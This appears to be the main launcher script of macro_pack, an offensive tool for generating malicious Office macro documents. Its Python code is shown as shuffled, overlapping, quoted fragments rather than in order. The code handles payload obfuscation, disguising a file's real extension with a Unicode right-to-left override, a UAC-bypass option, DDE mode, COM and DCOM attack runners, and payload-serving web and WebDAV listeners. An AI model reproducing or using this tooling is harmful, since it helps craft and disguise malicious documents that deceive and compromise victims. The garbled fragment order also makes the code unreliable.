utils.randomAlpha(9)) + \".vba\" if", "longOptions = [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\",", "#!/usr/bin/python3 # encoding: utf-8 import os import sys import getopt", "= int(arg) elif opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\" or", "try: # Create temporary work file. if mpSession.ddeMode or mpSession.template", "ContainerGenerator(mpSession) generator.run() #run com attack if mpSession.runTarget: generator = ComGenerator(mpSession)", "text format containing your VBA script.\" % mpSession.fileInput) logging.info(\" [+]", "= \"temp\" BANNER = help.getToolPres() def main(argv): global MP_TYPE logLevel", "attack if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if MP_TYPE ==", "# check if something is being piped logging.info(\" [-] Waiting", "os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION,", "opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else: if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt,", "not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE != \"Pro\"", "unicode RTLO\" % mpSession.unicodeRtlo) # Separate document path and extension", "help using %s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode:", "opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "\"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for", "mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9))", "not mpSession.isTrojanMode: # verify that output file does not already", "help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0) else:", "Input file path: %s\" % mpSession.fileInput) if MP_TYPE == \"Pro\":", "Wlistener.run() except Exception: logging.exception(\" [!] Exception caught!\") except KeyboardInterrupt: logging.error(\"", "mpSession.runTarget = os.path.abspath(arg) elif opt == \"--run-visible\": if sys.platform ==", "try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if", "%s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: # verify", "or opt==\"--template\": mpSession.template = arg elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER,", "int(arg) mpSession.WlistenPort = int(arg) elif opt==\"--icon\": mpSession.icon = arg elif", "if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find", "= os.path.join(os.getcwd(), WORKING_DIR) if MP_TYPE == \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory,", "= open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work", "not binary chars in input fil if utils.isBinaryString(open(mpSession.fileInput, 'rb').read(1024)): logging.error(\"", "opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten =", "elif opt==\"-l\" or opt==\"--listen\": mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg)", "logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\"", "if unicodeRtlo option is enabled if mpSession.unicodeRtlo: # Reminder; mpSession.unicodeRtlo", "not end with flagged extension # Append file extension fileName", "sys.exit(0) if logLevel == \"INFO\": os.system('cls' if os.name == 'nt'", "if not os.path.exists(working_directory): os.makedirs(working_directory) try: # Create temporary work file.", "Plugins} # use Colorama to make Termcolor work on Windows", "DcomGenerator(mpSession) generator.run() # Activate Web server if mpSession.listen: listener =", "sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could not", "Needed to avoid some weird race condition logging.info(\" [-] Store", "Inject %s false extension with unicode RTLO\" % mpSession.unicodeRtlo) #", "import MSTypes from common.definitions import VERSION, LOGLEVEL if sys.platform ==", "> 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen =", "\"--unicode-rtlo\": mpSession.unicodeRtlo = arg elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath", "file does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR:", "mpSession.outputFileType) elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is", "sys.platform == \"win32\": sys.stdin = open(\"conIN$\") else: sys.stdin = sys.__stdin__", "else: logging.info(\" [-] Target output format: %s\" % mpSession.outputFileType) elif", "inputFile = os.path.join(working_directory, \"command.cmd\") else: inputFile = os.path.join(working_directory, utils.randomAlpha(9)) +", "pipe, so we can call input() later without triggering EOF", "Input should be text format containing your VBA script.\" %", "import win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error: Could not find win32com.\")", "True mpSession.obfuscateNames = True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True", "mpSession.listen: listener = ListenServer(mpSession) listener.run() # Activate WebDav server if", "elif opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg) elif opt==\"--icon\":", "if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR: Could not find %s!\"", "# Argument not supplied, try to get file content from", "#run dcom attack if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() #", "ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen", "os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: # verify that output file", "dir: %s\" % working_directory) if not os.path.exists(working_directory): os.makedirs(working_directory) try: #", "\"--dde\": if sys.platform == \"win32\": mpSession.ddeMode = True elif opt", "import DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro", "\"--run-visible\": if sys.platform == \"win32\": mpSession.runVisible = True elif opt", "open(\"conIN$\") else: sys.stdin = sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput): logging.error(\"", "Activate WebDav server if mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run() except", "help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"-q\" or opt==\"--quiet\": logLevel = \"WARN\"", "os.path.abspath(arg) elif opt == \"-f\" or opt== \"--input-file\": mpSession.fileInput =", "name modified to: %s\" % mpSession.outputFilePath) # Retrieve the right", "output file format if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!]", "[!] Exception caught!\") except KeyboardInterrupt: logging.error(\" [!] Keyboard interrupt caught!\")", "= os.path.join(working_directory, utils.randomAlpha(9)) + \".vba\" if mpSession.stdinContent is not None:", "sys.exit(0) if __name__ == '__main__': # check if running from", "modules.Wlisten_server import WListenServer from modules.payload_builder_factory import PayloadBuilderFactory from common import", "Code} # {PyArmor Plugins} # use Colorama to make Termcolor", "if mpSession.communityMode: logging.warning(\" [!] Running in community mode (pro features", "elif opt==\"-q\" or opt==\"--quiet\": logLevel = \"WARN\" elif opt==\"-p\" or", "mpSession.forceYes = True elif opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt", "sys.stdin.readlines() # Close Stdin pipe, so we can call input()", "LOGLEVEL if sys.platform == \"win32\": try: import win32com.client #@UnresolvedImport @UnusedImport", "or mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\": try:", "= LOGLEVEL # initialize macro_pack session object working_directory = os.path.join(os.getcwd(),", "mpSession.outputFilePath = os.path.abspath(arg) elif opt == \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif", "sys.exit(0) else: if MP_TYPE == \"Pro\": arg_mgt_pro.processProArg(opt, arg, mpSession, BANNER)", "opt== \"--embed\": mpSession.embeddedFilePath = os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\": mpSession.template", "Could not find win32com.\") sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run", "# initialize macro_pack session object working_directory = os.path.join(os.getcwd(), WORKING_DIR) if", "mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not find output", "weird race condition logging.info(\" [-] Store std input in file...\")", "elif not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is None", "getopt.getopt(argv, shortOptions, longOptions) # @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2)", "sys.exit(0) if mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER,", "find win32com.\") sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator", "\"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "import os import sys import getopt import logging import shutil", "for piped input feed...\") mpSession.stdinContent = sys.stdin.readlines() # Close Stdin", "elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset =", "elif opt==\"--obfuscate-names-maxlen\": try: mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0])", "None and (MP_TYPE != \"Pro\" or mpSession.dcomTarget is None): logging.error(\"", "sys.stdin = sys.__stdin__ else: if not os.path.isfile(mpSession.fileInput): logging.error(\" [!] ERROR:", "format for %s. Input should be text format containing your", "file extension fileName += fileExtension mpSession.outputFilePath = fileName logging.info(\" [-]", "True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares =", "is None): logging.error(\" [!] You need to provide an output", "= arg elif opt == \"--listtemplates\": help.printTemplatesUsage(BANNER, sys.argv[0]) sys.exit(0) elif", "if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and", "extension with unicode RTLO\" % mpSession.unicodeRtlo) # Separate document path", "find %s!\" % mpSession.fileInput) sys.exit(2) else: logging.info(\" [-] Input file", "ComGenerator from modules.web_server import ListenServer from modules.Wlisten_server import WListenServer from", "or opt==\"--listen\": mpSession.listen = True mpSession.listenRoot = os.path.abspath(arg) elif opt==\"--port\":", "MSTypes.UNKNOWN: logging.error(\" [!] %s is not a supported extension. Use", "# {PyArmor Protection Code} # {PyArmor Plugins} # use Colorama", "not mpSession.listen and not mpSession.Wlisten and mpSession.runTarget is None and", "payload if payloadBuilder is not None: payloadBuilder.run() if MP_TYPE ==", "Only enabled on windows if sys.platform == \"win32\": longOptions.extend([\"run=\", \"run-visible\"])", "is None: # Argument not supplied, try to get file", "% mpSession.outputFilePath) sys.exit(2) #Create temporary folder logging.info(\" [-] Temporary working", "from pro_core.payload_builder_factory_pro import PayloadBuilderFactoryPro from pro_core import arg_mgt_pro, mp_session_pro else:", "BANNER = help.getToolPres() def main(argv): global MP_TYPE logLevel = LOGLEVEL", "arg elif opt in (\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif", "mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm =", "if os.path.isdir(working_directory): shutil.rmtree(working_directory) sys.exit(2) logging.info(\" [-] Store input file...\") shutil.copy2(mpSession.fileInput,", "encoding: utf-8 import os import sys import getopt import logging", "\"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions # Only enabled on windows", "\"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args = getopt.getopt(argv, shortOptions, longOptions) #", "% os.path.basename(utils.getRunningApp())) sys.exit(2) if not mpSession.isTrojanMode: # verify that output", "if mpSession.fileInput is not None: # Check there are not", "mpSession.obfuscateNames = True mpSession.obfuscateStrings = True mpSession.obfuscateDeclares = True elif", "Preparations...\") # check input args if mpSession.fileInput is None: #", "except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try: mpSession.obfuscatedNamesMinLen =", "time.sleep(0.4) # Needed to avoid some weird race condition logging.info(\"", "or opt==\"--start-function\": mpSession.startFunction = arg elif opt==\"-l\" or opt==\"--listen\": mpSession.listen", "sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True elif opt==\"-s\" or opt==\"--start-function\":", "mpSession.obfuscateStrings = True elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction = arg", "mpSession.WlistenPort = int(arg) elif opt==\"--icon\": mpSession.icon = arg elif opt==\"-w\"", "handlers=[utils.ColorLogFiler()]) logging.info(colored(BANNER, 'green')) logging.info(\" [+] Preparations...\") # check input args", "common.definitions import VERSION, LOGLEVEL if sys.platform == \"win32\": try: import", "# os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp()) # PyArmor Plugin: checkPlug()", "content from stdin if not os.isatty(0): # check if something", "if opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames =", "mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() # Activate Web server if", "\"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" #", "if not os.isatty(0): # check if something is being piped", "# Create temporary work file if mpSession.fileInput is not None:", "mpSession.fileInput) if MP_TYPE == \"Pro\": if mpSession.communityMode: logging.warning(\" [!] Running", "mpSession.startFunction = arg elif opt==\"-l\" or opt==\"--listen\": mpSession.listen = True", "try: longOptions = [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\",", "if running_from == 'explorer.exe': # os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp())", "RTLO to file name fileName += '\\u202e' # Append extension", "not applied)\") MP_TYPE=\"Community\" else: arg_mgt_pro.verify(mpSession) # Check output file format", "'\\u202e' # Append extension to spoof in reverse order fileName", "__name__ == '__main__': # check if running from explorer, if", "opt==\"--obfuscate-names-charset\": try: mpSession.obfuscatedNamesCharset = arg except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-names\": mpSession.obfuscateNames = True elif opt==\"--obfuscate-names-charset\":", "file format if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could", "on windows if sys.platform == \"win32\": longOptions.extend([\"run=\", \"run-visible\"]) opts, args", "logging.error(\" [!] %s is not a supported extension. Use --listformats", "# Activate WebDav server if mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run()", "== '__main__': # check if running from explorer, if yes", "File name modified to: %s\" % mpSession.outputFilePath) # Retrieve the", "PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder is not None: payloadBuilder.run()", "listener = ListenServer(mpSession) listener.run() # Activate WebDav server if mpSession.Wlisten:", "try: import win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error: Could not find", "\"print\", \"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for Pro release", "#run com attack if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if", "exist!\" % mpSession.outputFilePath) sys.exit(2) #Create temporary folder logging.info(\" [-] Temporary", "= [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\",", "== \"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession =", "later without triggering EOF #sys.stdin.close() if sys.platform == \"win32\": sys.stdin", "Reminder; mpSession.unicodeRtlo contains the extension we want to spoof, such", "name fileName += '\\u202e' # Append extension to spoof in", "'\\u200b' + mpSession.unicodeRtlo[::-1] # Prepend invisible space so filename does", "= fileName logging.info(\" [-] File name modified to: %s\" %", "does not already exist if os.path.isfile(mpSession.outputFilePath): logging.error(\" [!] ERROR: Output", "init from termcolor import colored # {PyArmor Protection Code} #", "avoid some weird race condition logging.info(\" [-] Store std input", "document path and extension (fileName, fileExtension) = os.path.splitext(mpSession.outputFilePath) logging.info(\" [-]", "or opt== \"--embed\": mpSession.embeddedFilePath = os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\":", "ComGenerator(mpSession) generator.run() if MP_TYPE == \"Pro\": #run dcom attack if", "\"--obfuscate\"): mpSession.obfuscateForm = True mpSession.obfuscateNames = True mpSession.obfuscateStrings = True", "[-] Store input file...\") shutil.copy2(mpSession.fileInput, inputFile) if os.path.isfile(inputFile): logging.info(\" [-]", "= True elif opt==\"-s\" or opt==\"--start-function\": mpSession.startFunction = arg elif", "if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import DcomGenerator from pro_modules.payload_builders.containers import ContainerGenerator", "false extension with unicode RTLO\" % mpSession.unicodeRtlo) # Separate document", "= True elif opt == \"--run\": if sys.platform == \"win32\":", "4 or mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-maxlen\":", "= PayloadBuilderFactoryPro().getPayloadBuilder(mpSession) else: payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if", "opt in (\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif opt ==", "\"--embed\": mpSession.embeddedFilePath = os.path.abspath(arg) elif opt==\"-t\" or opt==\"--template\": mpSession.template =", "and mpSession.runTarget is None and (MP_TYPE != \"Pro\" or mpSession.dcomTarget", "logging.error(\" [!] ERROR: Output file %s already exist!\" % mpSession.outputFilePath)", "if os.path.isdir(working_directory): shutil.rmtree(working_directory) logging.info(\" Done!\\n\") sys.exit(0) if __name__ == '__main__':", "mpSession.outputFilePath = fileName logging.info(\" [-] File name modified to: %s\"", "'explorer.exe': # os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp()) # PyArmor Plugin:", "\"force-yes\", \"help\"] shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for Pro release if", "arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten = True mpSession.WRoot =", "== \"win32\": try: import win32com.client #@UnresolvedImport @UnusedImport except: print(\"Error: Could", "Could not find %s!\" % mpSession.fileInput) sys.exit(2) else: logging.info(\" [-]", "mpSession.obfuscatedNamesMinLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen", "an output file! (get help using %s -h)\" % os.path.basename(utils.getRunningApp()))", "help from common.utils import MSTypes from common.definitions import VERSION, LOGLEVEL", "opt==\"--port\": mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg) elif opt==\"--icon\": mpSession.icon", "= arg elif opt == \"-e\" or opt== \"--embed\": mpSession.embeddedFilePath", "# running_from = psutil.Process(os.getpid()).parent().parent().name() # if running_from == 'explorer.exe': #", "the right payload builder if mpSession.outputFileType != MSTypes.UNKNOWN: if MP_TYPE", "> 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-strings\": mpSession.obfuscateStrings = True", "mpSession.outputFileType != MSTypes.UNKNOWN: if MP_TYPE == \"Pro\" and not mpSession.communityMode:", "longOptions) # @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt,", "= os.path.abspath(arg) elif opt == \"-f\" or opt== \"--input-file\": mpSession.fileInput", "is not a supported extension. Use --listformats to view supported", "elif opt == \"--force-yes\": mpSession.forceYes = True elif opt==\"--uac-bypass\": mpSession.uacBypass", "global MP_TYPE logLevel = LOGLEVEL # initialize macro_pack session object", "{PyArmor Protection Code} # {PyArmor Plugins} # use Colorama to", "mpSession.printFile = True elif opt == \"--dde\": if sys.platform ==", "mpSession.dcomTarget is None): logging.error(\" [!] You need to provide an", "Pro release if MP_TYPE == \"Pro\": longOptions.extend(arg_mgt_pro.proArgsLongOptions) shortOptions += arg_mgt_pro.proArgsShortOptions", "logLevel == \"INFO\": os.system('cls' if os.name == 'nt' else 'clear')", "running_from == 'explorer.exe': # os.system(\"cmd.exe /k \\\"%s\\\"\" % utils.getRunningApp()) #", "% inputFile) # Edit outputfile name to spoof extension if", "format if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)): logging.error(\" [!] Could not", "Web server if mpSession.listen: listener = ListenServer(mpSession) listener.run() # Activate", "Temporary input file: %s\" % inputFile) # Edit outputfile name", "[-] Input file path: %s\" % mpSession.fileInput) if MP_TYPE ==", "check if something is being piped logging.info(\" [-] Waiting for", "== \"-e\" or opt== \"--embed\": mpSession.embeddedFilePath = os.path.abspath(arg) elif opt==\"-t\"", "output folder %s.\" % os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType == MSTypes.UNKNOWN:", "init() WORKING_DIR = \"temp\" BANNER = help.getToolPres() def main(argv): global", "elif opt == \"--dde\": if sys.platform == \"win32\": mpSession.ddeMode =", "not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile = os.path.join(working_directory, \"command.cmd\")", "# @UnusedVariable except getopt.GetoptError: help.printUsage(BANNER, sys.argv[0]) sys.exit(2) for opt, arg", "True mpSession.obfuscateDeclares = True elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif", "== \"--listformats\": help.printAvailableFormats(BANNER) sys.exit(0) elif opt==\"-h\" or opt==\"--help\": help.printUsage(BANNER, sys.argv[0])", "piped input feed...\") mpSession.stdinContent = sys.stdin.readlines() # Close Stdin pipe,", "shortOptions= \"e:l:w:s:f:t:G:hqmop\" # only for Pro release if MP_TYPE ==", "# Check output file format if mpSession.outputFilePath: if not os.path.isdir(os.path.dirname(mpSession.outputFilePath)):", "mpSession.template or (mpSession.outputFileType not in MSTypes.VB_FORMATS+[MSTypes.VBA] and not mpSession.htaMacro): inputFile", "triggering EOF #sys.stdin.close() if sys.platform == \"win32\": sys.stdin = open(\"conIN$\")", "% fileExtension) # Append unicode RTLO to file name fileName", "Create temporary work file. if mpSession.ddeMode or mpSession.template or (mpSession.outputFileType", "mpSession.fileInput is None: # Argument not supplied, try to get", "mpSession = mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions = [\"embed=\", \"listen=\",", "MP_TYPE logLevel = LOGLEVEL # initialize macro_pack session object working_directory", "MSTypes.UNKNOWN: if MP_TYPE == \"Pro\" and not mpSession.communityMode: payloadBuilder =", "sys.platform == \"win32\": mpSession.runTarget = os.path.abspath(arg) elif opt == \"--run-visible\":", "running from explorer, if yes restart from cmd line #", "os.path.abspath(arg) elif opt == \"--run-visible\": if sys.platform == \"win32\": mpSession.runVisible", "== \"Pro\": if mpSession.communityMode: logging.warning(\" [!] Running in community mode", "spoof in reverse order fileName += '\\u200b' + mpSession.unicodeRtlo[::-1] #", "[-] Temporary working dir: %s\" % working_directory) if not os.path.exists(working_directory):", "= int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen <", "and not mpSession.Wlisten and mpSession.runTarget is None and (MP_TYPE !=", "to: %s\" % mpSession.outputFilePath) # Retrieve the right payload builder", "f = open(inputFile, 'w') f.writelines(mpSession.stdinContent) f.close() else: # Create temporary", "extension. Use --listformats to view supported MacroPack formats.\" % os.path.splitext(mpSession.outputFilePath)[1])", "logging.error(\" [!] ERROR: Invalid format for %s. Input should be", "output file! (get help using %s -h)\" % os.path.basename(utils.getRunningApp())) sys.exit(2)", "KeyboardInterrupt: logging.error(\" [!] Keyboard interrupt caught!\") logging.info(\" [+] Cleaning...\") if", "opt==\"--uac-bypass\": mpSession.uacBypass = True elif opt == \"--unicode-rtlo\": mpSession.unicodeRtlo =", "= arg except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) elif opt==\"--obfuscate-names-minlen\": try:", "\"Pro\": mpSession = mp_session_pro.MpSessionPro(working_directory, VERSION, MP_TYPE) else: mpSession = mp_session.MpSession(working_directory,", "print(\"Error: Could not find win32com.\") sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from", "mp_session.MpSession(working_directory, VERSION, MP_TYPE) try: longOptions = [\"embed=\", \"listen=\", \"port=\", \"webdav-listen=\",", "mpSession.listenPort = int(arg) mpSession.WlistenPort = int(arg) elif opt==\"--icon\": mpSession.icon =", "f.close() else: # Create temporary work file if mpSession.fileInput is", "[!] Keyboard interrupt caught!\") logging.info(\" [+] Cleaning...\") if os.path.isdir(working_directory): shutil.rmtree(working_directory)", "sys.argv[0]) sys.exit(0) if logLevel == \"INFO\": os.system('cls' if os.name ==", "Prepend invisible space so filename does not end with flagged", "arg, mpSession, BANNER) else: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if logLevel ==", "True elif opt == \"--force-yes\": mpSession.forceYes = True elif opt==\"--uac-bypass\":", "mpSession.obfuscatedNamesMaxLen < 4 or mpSession.obfuscatedNamesMaxLen > 255: help.printUsage(BANNER, sys.argv[0]) sys.exit(0)", "logging.info(\" [-] Store std input in file...\") f = open(inputFile,", "not None: payloadBuilder.run() if MP_TYPE == \"Pro\": generator = ContainerGenerator(mpSession)", "sys.platform == \"win32\": mpSession.ddeMode = True elif opt == \"--run\":", "os.system('cls' if os.name == 'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging,", "elif opt==\"--obfuscate-form\": mpSession.obfuscateForm = True elif opt==\"--obfuscate-declares\": mpSession.obfuscateDeclares = True", "{PyArmor Plugins} # use Colorama to make Termcolor work on", "int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4", "logging.warning(\" [!] Running in community mode (pro features not applied)\")", "modified to: %s\" % mpSession.outputFilePath) # Retrieve the right payload", "elif opt == \"-f\" or opt== \"--input-file\": mpSession.fileInput = arg", "Argument not supplied, try to get file content from stdin", "import PayloadBuilderFactory from common import utils, mp_session, help from common.utils", "mpSession.obfuscatedNamesMaxLen = int(arg) except ValueError: help.printUsage(BANNER, sys.argv[0]) sys.exit(0) if mpSession.obfuscatedNamesMaxLen", "dcom attack if mpSession.dcom: generator = DcomGenerator(mpSession) generator.run() # Activate", "sys.argv[0]) sys.exit(2) for opt, arg in opts: if opt in", "com attack if mpSession.runTarget: generator = ComGenerator(mpSession) generator.run() if MP_TYPE", "pro_core import arg_mgt_pro, mp_session_pro else: MP_TYPE=\"Community\" from colorama import init", "f.writelines(mpSession.stdinContent) f.close() else: # Create temporary work file if mpSession.fileInput", "\"--input-file\": mpSession.fileInput = arg elif opt == \"-e\" or opt==", "logging.info(\" [-] Temporary input file: %s\" % inputFile) # Edit", "payloadBuilder = PayloadBuilderFactory().getPayloadBuilder(mpSession) # Build payload if payloadBuilder is not", "(\"-G\", \"--generate\"): mpSession.outputFilePath = os.path.abspath(arg) elif opt == \"--listformats\": help.printAvailableFormats(BANNER)", "Target output format: %s\" % mpSession.outputFileType) elif not mpSession.listen and", "file %s already exist!\" % mpSession.outputFilePath) sys.exit(2) #Create temporary folder", "to spoof, such as \"jpg\" logging.info(\" [+] Inject %s false", "modules.web_server import ListenServer from modules.Wlisten_server import WListenServer from modules.payload_builder_factory import", "= arg elif opt==\"-w\" or opt==\"--webdav-listen\": mpSession.Wlisten = True mpSession.WRoot", "not a supported extension. Use --listformats to view supported MacroPack", "%s\" % mpSession.fileInput) if MP_TYPE == \"Pro\": if mpSession.communityMode: logging.warning(\"", "[-] Waiting for piped input feed...\") mpSession.stdinContent = sys.stdin.readlines() #", "\"listen=\", \"port=\", \"webdav-listen=\", \"generate=\", \"quiet\", \"input-file=\", \"encode\", \"obfuscate\", \"obfuscate-form\", \"obfuscate-names\",", "to avoid some weird race condition logging.info(\" [-] Store std", "if running from explorer, if yes restart from cmd line", "not find win32com.\") sys.exit(1) MP_TYPE=\"Pro\" if utils.checkModuleExist(\"pro_core\"): from pro_modules.utilities.dcom_run import", "% os.path.dirname(mpSession.outputFilePath)) sys.exit(2) if mpSession.outputFileType == MSTypes.UNKNOWN: logging.error(\" [!] %s", "%s\" % mpSession.outputFileType) elif not mpSession.listen and not mpSession.Wlisten and", "WebDav server if mpSession.Wlisten: Wlistener = WListenServer(mpSession) Wlistener.run() except Exception:", "already exist!\" % mpSession.outputFilePath) sys.exit(2) #Create temporary folder logging.info(\" [-]", "in opts: if opt in (\"-o\", \"--obfuscate\"): mpSession.obfuscateForm = True", "sys.exit(0) if mpSession.obfuscatedNamesMinLen < 4 or mpSession.obfuscatedNamesMinLen > 255: help.printUsage(BANNER,", "Activate Web server if mpSession.listen: listener = ListenServer(mpSession) listener.run() #", "\"obfuscate-declares\", \"obfuscate-strings\", \"obfuscate-names-charset=\", \"obfuscate-names-minlen=\", \"obfuscate-names-maxlen=\", \"file=\",\"template=\",\"listtemplates\",\"listformats\",\"icon=\", \"start-function=\",\"uac-bypass\", \"unicode-rtlo=\", \"dde\", \"print\",", "== 'nt' else 'clear') # Logging logging.basicConfig(level=getattr(logging, logLevel),format=\"%(message)s\", 